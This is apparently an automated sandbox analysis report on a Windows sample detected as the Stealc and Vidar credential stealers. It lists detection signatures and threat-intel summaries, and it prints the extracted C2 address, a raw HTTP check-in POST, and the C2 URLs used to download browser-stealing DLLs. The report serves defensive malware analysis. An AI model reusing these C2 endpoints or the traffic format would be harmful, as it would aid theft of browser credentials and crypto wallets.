Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1524532
MD5:	48d1da4a5abcc06e5b66eceb3358798b
SHA1:	ef7f178c14b591875355ef9b0d4b0cb70f4160ac
SHA256:	bbbf8e47190ac2362630096db0b05371e693bf298be7a8ec2a18179595521fec
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 6104 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 48D1DA4A5ABCC06E5B66ECEB3358798B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2274503696.000000000154E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.2047168594.0000000005240000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 6104	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 6104	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 6104	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 6104	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.890000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T23:10:02.402117+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.5	49704	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T23:10:02.395989+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T23:10:02.631424+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T23:10:03.726856+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T23:10:02.640407+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.5	49704	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T23:10:02.173952+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T23:10:04.205057+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-02T23:10:10.665726+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-02T23:10:11.755535+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-02T23:10:12.411919+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-02T23:10:12.941595+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-02T23:10:15.166427+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-02T23:10:15.778698+0200	2803304	3	Unknown Traffic	192.168.2.5	49704	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKKKFCFHCFIECBGDHIDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 45 42 33 45 31 39 32 30 43 32 32 33 31 32 30 32 37 36 32 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 2d 2d 0d 0a Data Ascii: ------IJKKKFCFHCFIECBGDHIDContent-Disposition: form-data; name="hwid"1CEB3E1920C22312027626------IJKKKFCFHCFIECBGDHIDContent-Disposition: form-data; name="build"doma------IJKKKFCFHCFIECBGDHID--

Source: file.exe, 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2274503696.000000000154E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2274503696.00000000015A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2274503696.00000000015C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.2274503696.00000000015C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dllo/
Source: file.exe, 00000000.00000002.2274503696.00000000015C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.2274503696.00000000015C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.2274503696.0000000001594000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.2274503696.0000000001594000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllw
Source: file.exe, 00000000.00000002.2274503696.00000000015C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.2274503696.00000000015C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dllk(
Source: file.exe, 00000000.00000002.2274503696.00000000015C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.2274503696.00000000015C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllY(
Source: file.exe, 00000000.00000002.2274503696.00000000015C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.2274503696.00000000015C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll9)
Source: file.exe, 00000000.00000002.2274503696.0000000001625000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2274503696.00000000015D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2274503696.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2274503696.0000000001594000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2274503696.0000000001625000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: file.exe, 00000000.00000002.2274503696.0000000001625000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3D
Source: file.exe, 00000000.00000002.2274503696.00000000015A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php5
Source: file.exe, 00000000.00000002.2274503696.00000000015A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php9
Source: file.exe, 00000000.00000002.2274503696.0000000001625000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpP1c
Source: file.exe, 00000000.00000002.2274503696.00000000015A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpa
Source: file.exe, 00000000.00000002.2274503696.0000000001625000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpc
Source: file.exe, 00000000.00000002.2274503696.0000000001625000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpdll
Source: file.exe, 00000000.00000002.2274503696.0000000001625000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpdllo
Source: file.exe, 00000000.00000002.2274503696.00000000015D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpinomi
Source: file.exe, 00000000.00000002.2274503696.0000000001625000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpl
Source: file.exe, 00000000.00000002.2274503696.00000000015D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpla
Source: file.exe, 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.2274503696.00000000015D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpwser
Source: file.exe, 00000000.00000002.2274503696.000000000154E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37H
Source: file.exe, 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2285775437.000000001DAC5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2301450487.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.2120917558.0000000001603000.00000004.00000020.00020000.00000000.sdmp, GIEBGIIJ.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.2290554138.0000000029B8C000.00000004.00000020.00020000.00000000.sdmp, KFCAFIIDHIDGHIECGDGI.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2290554138.0000000029B8C000.00000004.00000020.00020000.00000000.sdmp, KFCAFIIDHIDGHIECGDGI.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: file.exe, 00000000.00000003.2120917558.0000000001603000.00000004.00000020.00020000.00000000.sdmp, GIEBGIIJ.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2120917558.0000000001603000.00000004.00000020.00020000.00000000.sdmp, GIEBGIIJ.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2120917558.0000000001603000.00000004.00000020.00020000.00000000.sdmp, GIEBGIIJ.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2290554138.0000000029B8C000.00000004.00000020.00020000.00000000.sdmp, KFCAFIIDHIDGHIECGDGI.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2290554138.0000000029B8C000.00000004.00000020.00020000.00000000.sdmp, KFCAFIIDHIDGHIECGDGI.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000003.2120917558.0000000001603000.00000004.00000020.00020000.00000000.sdmp, GIEBGIIJ.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2120917558.0000000001603000.00000004.00000020.00020000.00000000.sdmp, GIEBGIIJ.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2120917558.0000000001603000.00000004.00000020.00020000.00000000.sdmp, GIEBGIIJ.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: KFCAFIIDHIDGHIECGDGI.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: AAKEGIJEHJDGDHJKJKKJDGCAAK.0.dr	String found in binary or memory: https://support.mozilla.org
Source: AAKEGIJEHJDGDHJKJKKJDGCAAK.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: AAKEGIJEHJDGDHJKJKKJDGCAAK.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.2290554138.0000000029B8C000.00000004.00000020.00020000.00000000.sdmp, KFCAFIIDHIDGHIECGDGI.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.2290554138.0000000029B8C000.00000004.00000020.00020000.00000000.sdmp, KFCAFIIDHIDGHIECGDGI.0.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.2120917558.0000000001603000.00000004.00000020.00020000.00000000.sdmp, GIEBGIIJ.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2120917558.0000000001603000.00000004.00000020.00020000.00000000.sdmp, GIEBGIIJ.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: AAKEGIJEHJDGDHJKJKKJDGCAAK.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: AAKEGIJEHJDGDHJKJKKJDGCAAK.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: AAKEGIJEHJDGDHJKJKKJDGCAAK.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2221866867.000000002FD56000.00000004.00000020.00020000.00000000.sdmp, AAKEGIJEHJDGDHJKJKKJDGCAAK.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: AAKEGIJEHJDGDHJKJKKJDGCAAK.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2221866867.000000002FD56000.00000004.00000020.00020000.00000000.sdmp, AAKEGIJEHJDGDHJKJKKJDGCAAK.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2221866867.000000002FD56000.00000004.00000020.00020000.00000000.sdmp, AAKEGIJEHJDGDHJKJKKJDGCAAK.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

